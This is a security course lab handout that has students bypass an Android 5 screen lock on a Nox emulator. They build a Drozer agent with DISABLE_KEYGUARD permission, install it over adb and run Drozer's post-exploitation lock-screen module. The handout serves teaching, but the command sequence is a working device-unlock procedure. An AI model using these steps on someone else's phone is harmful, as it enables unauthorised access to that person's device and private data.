Proj 13x: Bypassing a Screen Lock with Nox (10 pts)
What You Need for This Project
- A Nox Android emulator, with Kali and adb connected to it,
which you prepared in previous projects. The host system can
be either two PCs or one Mac.
Purpose
To bypass a screen lock using a
Drozer agent on an Android 5 device.
Don't use a more recent
Android version or it won't work.
Start Nox
Start Nox. If there is no PIN,
Open Settings, Security,
"Screen lock" and assign a PIN
of 1234
as shown below.
Restart Nox
Close Nox and start it again.
Swipe up but don't enter the PIN,
so you see the lock screen,
as shown below.
Downgrading Java
Drozer can't sign apps with recent Java
versions, so we need to downgrade Java.
Execute these commands to do that.
apt update
apt install openjdk-8-jdk -y
If an "Outdated processor microcode"
box appears, press Enter.
Execute this command to reboot Kali.
reboot
Execute this command to select the default
version of javac, the
Java compiler:
update-alternatives --config javac
Find "java-8" on the list and select it. When
I did it, that was item 2
as shown below.
Execute this command to select the default
version of java:
update-alternatives --config java
Find "java-8" on the list and select it. When
I did it, that was item 2
as shown below.
Building a Drozer App
To build a Drozer app that requests DISABLE_KEYGUARD
permission,
in Kali, in a Terminal, at the # bash prompt,
execute this command:
drozer agent build --permission android.permission.DISABLE_KEYGUARD
The agent is built and placed in the /tmp
directory. Note the path to the agent,
highlighted in the image below.
Connecting with ADB
As you did in previous projects,
connect to your Nox emulator from Kali,
as shown below.
Installing the App
In Kali, in a Terminal, at the # bash prompt,
execute these commands to remove any existing
agent and install the new one. Replace the
path in the second command to match the correct
path on ypur system.
adb uninstall com.mwr.dz
adb install /tmp/tmpvJw0NB/agent.apk
The agent installs, as shown below.
Starting the App
In Kali, in a Terminal, at the # bash prompt,
execute these commands, to start the agent
and forward the TCP port back to Kali.
adb shell am broadcast -n com.mwr.dz/.receivers.Receiver -c com.mwr.dz.START_EMBEDDED
adb forward tcp:31415 tcp:31415
The commands succeed,
as shown below.
<
Installing Drozer Modules
In Kali, in a Terminal, at the # bash prompt,
execute these commands, to launch
Drozer and install the post-exploitation
modules.
drozer console connect
module install post
When Drozer asks for a directory to put the modules
in, enter this directory:
/usr/local/drozer
The modules install,
as shown below.
Unlocking the Phone
In Kali, in a Terminal, at the # bash prompt,
execute this command.
run post.perform.disablelockscreen
The
phone is unlocked,
and Drozer returns a message saying
"Done. Check device." message,
as shown below.
Saving a Screen Image
Make sure the "Done. Check device." message
is visible, as shown above.
Save a full-desktop image. On a Mac, press Shift+Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Save the image with the filename "YOUR NAME Proj 13x", replacing "YOUR NAME" with your real name.
Turning in your Project
Email the image to
to cnit.128sam@gmail.com with the subject line:
Proj 13x from YOUR NAME
Posted 3-20-19